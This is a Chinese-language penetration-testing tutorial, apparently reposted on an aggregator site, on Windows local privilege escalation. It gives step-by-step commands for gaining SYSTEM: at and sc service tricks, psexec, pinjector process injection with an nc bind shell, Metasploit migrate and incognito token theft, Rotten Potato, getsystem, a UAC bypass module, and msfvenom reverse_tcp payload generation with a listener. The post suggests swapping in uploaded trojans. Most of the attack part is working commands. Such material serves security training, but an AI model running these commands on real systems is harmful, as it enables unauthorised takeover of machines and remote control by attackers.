权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC

这篇具有很好参考价值的文章主要介绍了权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

权限提升基础信息

1、具体有哪些权限需要我们了解掌握的?

后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等

2、以上常见权限获取方法简要归类说明?

后台权限:SQL注入,数据库备份泄露,默认或弱口令等获取帐号密码进入

网站权限:后台提升至网站权限,RCE或文件操作类、反序列化等漏洞直达Shell

数据库权限:SQL注入,数据库备份泄露,默认或弱口令等进入或网站权限获取后转入

接口权限:SQL注入,数据库备份泄露,源码泄漏,培植不当等或网站权限获取后转入

系统权限:高危系统漏洞直达或网站权限提升转入、数据库权限提升转入,第三方转入等

域控权限:高危系统漏洞直达或内网横向渗透转入,域控其他服务安全转入等

3、以上常见权限获取后能操作的具体事情?

后台权限:

常规WEB界面文章分类等操作,后台功能可操作类

网站权限:

查看或修改程序源代码,可以进行网站或应用的配置文件读取(接口配置信息,数据库配置信息等),还能收集服务器操作系统相关的信息,为后续系统提权做准备。

数据库权限:

操作数据库的权限,数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。也可以作为提升系统权限手段。

接口权限:

后台或网站权限后的获取途径:后台(修改配置信息功能点),网站权限(查看的配置文件获取),具体可以操作的事情大家自己想想。

系统权限:如同在你自己操作自己的电脑一样

域控权限:如同在你自己操作自己的虚拟机一样

案例演示:Windows系统-AT&SC&PS命令提权

windows本地用户提权-AT命令提权

at命令提权的原理

        at命令是一个计划命令,可以在规定时间完成一些操作,这个命令调用system权限。

适用版本:Win2000 & Win2003 & XP中还是存在的,在Win7以后被剔除.

当我们拿下低权限的用户,通过连接上服务器后,可以通过at命令来进行本地提权。

提权测试:Win2003

前提:已获取本地用户权限

1.执行命令:at 13:38 /interactive cmd      (在13:38分生成一个交互式的System权限的cmd)

权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC,权限提升,windows,网络安全,web安全

2.时间到13:38分后,生成一个交互式的System权限的cmd,提权成功

权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC,权限提升,windows,网络安全,web安全

3.如果使用Win10版本,可以看到没有办法生效

权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC,权限提升,windows,网络安全,web安全

4.还可以将时间后面的路径更改为上传的提权木马。

 

windows本地用户提权-SC命令提权

SC命令介绍

         sc是用于与服务控制管理器和服务进行通信的命令行程序。提供的功能类似于控制面板中管理工具项中的服务,通俗理解就是 SC 可以启动一个服务

适用版本:windows/ 7、8、2003、2008、2012、2016

提权测试:Win 2003

前提:已获取本地用户权限

1.执行命令:sc Create syscmd binPath= "cmd /K start" type= own type= interact    

   命令解释:创建一个名叫syscmd的新的交互式的cmd执行服务

  执行命令:sc start syscmd    #启动syscmd服务

2.启动服务后重新弹出一个cmd窗口,执行whoami,成功提权

权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC,权限提升,windows,网络安全,web安全

3.实战中还可以将binPath="cmd /K start"  更换为binPath="上传的木马路径"  运行木马文件来获取system权限。

 

windows本地用户提权-PS命令提权

适用版本: 适用于Windows/2003、2008、2012、2016

微软官方系统调试工具包:​​ PsTools - Sysinternals | Microsoft Learn​​

提权测试:Win 2003

前提:已获取本地用户权限

1.将工具包上传到目标目录,命令行执行命令

执行命令:psexec.exe -accepteula -s -i -d cmd   #调用运行cmd

2.执行命令成功,出现新的cmd弹窗,在新的cmd执行whoami,成功提权

权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC,权限提升,windows,网络安全,web安全

 

 

案例:进程迁移注入提权-pinjector工具&MSF

前提条件:需要存在system权限的进程,就可以使用迁移。没有就是当前权限不够

介绍:

       进程迁移注入提权就是将获取到权限低的进程注入至进程中权限高的中,这样就实现了权限提升,同时注入进程提权相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现。

原理:把我的进程注入到一个现有的system账号运行的进程中,这样我的进程也就具有了system账号的权限了。

pinjector工具注入

提权测试:Win 2003  pinjector工具貌似只适用于2003版本。

前提:已获取本地用户权限

1.pinjector工具实现进程注入,需要先下载工具,然后将工具上传需要提权的系统中即可。

下载:http://www.tarasco.org/security/Process_Injector/

2.将工具上传之后,执行命令查看所有进程的权限

  执行命令:pinjector.exe -l    #列取所有进程

权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC,权限提升,windows,网络安全,web安全

3.选择一个system权限的进程pid编号,使用命令将权限绑定到进程中。

执行命令:pinjector.exe -p <pid> cmd <port>  #选择一个system权限运行的进程,对此pid进程执行注入,并建立侦听端口

权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC,权限提升,windows,网络安全,web安全

4.使用nc命令连接进程,成功提权

  命令:nc -nv 目标ip 端口

权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC,权限提升,windows,网络安全,web安全

MSF进程注入

前提:生成一个MSF木马上传让其上线,并连接。

msf木马

1.在反弹回来的shell界面输入命令,然后查看所有进程以及相应的权限。

执行命令:ps   #查看进程

权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC,权限提升,windows,网络安全,web安全

2.选择一个system权限的进程的pid编号,使用命令将权限绑定到进程中。

   执行命令:migrate pid编号   #迁移进程

   执行getuid命令,成功提权。

权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC,权限提升,windows,网络安全,web安全

MSF令牌窃取

前提:生成一个MSF木马上传让其上线,并连接。

1.在反弹回来的shell界面执行命令进行令牌窃取提权。

执行命令:

use incognito   #选择攻击模块

list_tokens -u   #列出令牌

impersonate_token "NT AUTHORITY\SYSTEM"   #窃取system令牌

获取system权限,提权成功

权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC,权限提升,windows,网络安全,web安全

烂土豆提权

2.如果权限不够(如:只有web shell权限) 无法获取system令牌,可以配合烂土豆漏洞获取。

烂土豆下载:https://github.com/foxglovesec/Potato

程序路径:Potato/source/Potato/Potato/bin/Release/Potato.exe

生成一个MSF木马上传让其上线,并连接,再在目标系统上传烂土豆程序:potato.exe。在反弹回来的shell界面执行命令。

执行命令:

execute -cH -f ./potato.exe   #执行烂土豆程序

use incognito   #加载窃取模块

list_tokens -u   #查看可窃取的令牌

impersonate_token "NT AUTHORITY\SYSTEM"   #窃取令牌

getsystem提权

前提:生成一个MSF木马上传让其上线,并连接。

1.在反弹回来的shell界面执行命令进行提权。

执行命令:getsystem    #自动化提权

权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC,权限提升,windows,网络安全,web安全

2.如果目标用户开启了UAC验证,则getsystem方法可能无法提权。这时就需要使用msf中UAC提权。

权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC,权限提升,windows,网络安全,web安全

uac提权

1.上传木马反弹shell回来的时候测试一下getsystem,发现无法提权。

权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC,权限提升,windows,网络安全,web安全

2.启动msf,选择UAC绕过模块。

此处测试是针对UAC被设置为高等级的情况,使用的是钓鱼模块,运行后目标主机弹窗,需要目标点击确定才能触发。

建议优先使用其他模块:search uac   #搜索uac模块

执行命令:

use exploit/windows/local/ask    #使用钓鱼模块
sessions         #查看后台进程
set session 1    #选择进程

set lport 5555   #设置监听端口

run  #启动

权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC,权限提升,windows,网络安全,web安全

3.再次执行 getsystem 提权命令,成功提权。

权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC,权限提升,windows,网络安全,web安全

4.如果还是无法提权,可以尝试其他uac模块。

MSF木马生成——windows

1.执行木马生成命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=监听的ip LPORT=监听的端口 -f exe > shell.exe

权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC,权限提升,windows,网络安全,web安全

2.设置监听,接收反弹回来的shell。

执行命令:

msfconsole  #启动msf
use exploit/multi/handler   #载入监控模块
set PAYLOAD windows/meterpreter/reverse_tcp   #加载payload
set LHOST 监听ip   #设置监听ip
set LPORT 监听端口   #设置监听端口
run  #启动监听

权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC,权限提升,windows,网络安全,web安全文章来源地址https://www.toymoban.com/news/detail-690876.html

更多提权方式请看:https://blog.csdn.net/m0_51345235/category_12422451.html

到了这里,关于权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 权限提升:网站漏洞(提权思路.)

    权限提升简称 提权 ,由于 操作系统都是多用户操作系统 , 用户之间都有权限控制 ,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其提升为管理甚至是 System 权限。通常通

    2024年02月05日
    浏览(42)
  • 操作系统权限提升(十九)之Linux提权-SUID提权

    系列文章 操作系统权限提升(十八)之Linux提权-内核提权 SUID是一种特殊权限,设置了suid的程序文件,在用户执行该程序时,用户的权限是该程序文件属主的权限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的权限。sgid与suid类似,只是执行程序时获

    2024年02月14日
    浏览(42)
  • 操作系统权限提升(十八)之Linux提权-内核提权

    内核提权是利用Linux内核的漏洞进行提权的,内核漏洞进行提权一般包括三个环节: 1、对目标系统进行信息收集,获取到系统内核信息及版本信息; 2、根据内核版本获取其对应的漏洞以及EXP 3、使用找到的EXP对目标系统发起攻击,完成提权操作 查看Linux操作系统的内核版本

    2024年01月16日
    浏览(46)
  • CVE-2023-36874 Windows错误报告服务本地权限提升漏洞分析

    漏洞简介 Windows错误报告服务在提交错误报告前会创建 wermgr.exe 进程,而攻击者使用特殊手法欺骗系统创建伪造的wermgr.exe进程,从而以 system 权限执行代码。 影响版本 危害等级 7.8 ∣ H I G H textcolor{Red}{7.8 | HIGH} 7.8∣ H I G H 漏洞复现 首先在C盘下创建一个目录testsystem32,然后将

    2024年02月11日
    浏览(37)
  • Linux权限提升—定时任务、环境变量、权限配置不当、数据库等提权

      在上篇文章中提到了Linux权限提升之前的信息收集操作,这里就不在赘述,在前言中讲上篇文章为提到的内容进行补充,至于其它内容可参考上篇文章。   Linux权限提升—内核、SUID、脏牛等提权   这里提一下,之前在设计找EXP都是使用自动化进行编译,但是就会出现

    2023年04月08日
    浏览(103)
  • 操作系统权限提升(十四)之绕过UAC提权-基于白名单AutoElevate绕过UAC提权

    系列文章 操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述 操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权 注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!! 利用白名单程序的本质实际上是劫持注册表,这种方法主要是通过寻找autoElevated属性为

    2024年02月16日
    浏览(38)
  • 操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权

    系列文章 操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述 注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!! 拿到一个普通管理员的SHELL,在CS中没有*号代表有UAC 执行添加用户的命令时显示拒绝访问 使用CS自带的插件进行绕过提权 直接提到了system权限

    2024年02月16日
    浏览(42)
  • 提权 - Windows 烂土豆/ dll劫持 /服务权限

    烂土豆结合令牌窃取进行提权,WEB权限提权到system权限。 1.原理 1.欺骗“NT AUTHORITYSYSTEM”账户通过NTLM认证到控制的TCP终端 2.对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITYSYSTEM”账户本地协商一个安全令牌。这个过程通过一系列的Windows API调用实现的。 3.模仿这

    2024年01月19日
    浏览(58)
  • Linux 查看进程ps命令详解

    ps 命令是 Linux 系统中常用的进程查看工具,它可以查看当前系统中正在运行的进程信息。ps 命令可以显示进程的 ID、状态、执行命令、占用内存等信息,对于系统管理员来说,使用 ps 命令可以方便地监控和管理系统中的进程。 ps 命令的基本语法如下: 常用的选项包括: 选

    2024年02月14日
    浏览(59)
  • Linux基础命令-ps查看进程状态

    Linux基础命令-sort内容排序 Linux基础命令-chattr更改文件隐藏属性 文章目录 前言 一 命令的介绍 二 语法及参数 2.1 通过help和man查看命令的语法 2.2 命令参数 2.3 常用参数 三 参数使用与内容含义 3.1 查看系统当中所有的数据 3.1.1 ps aux中状态栏的含义 3.1.2 STAT进程状态各自代表的含

    2024年02月03日
    浏览(46)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包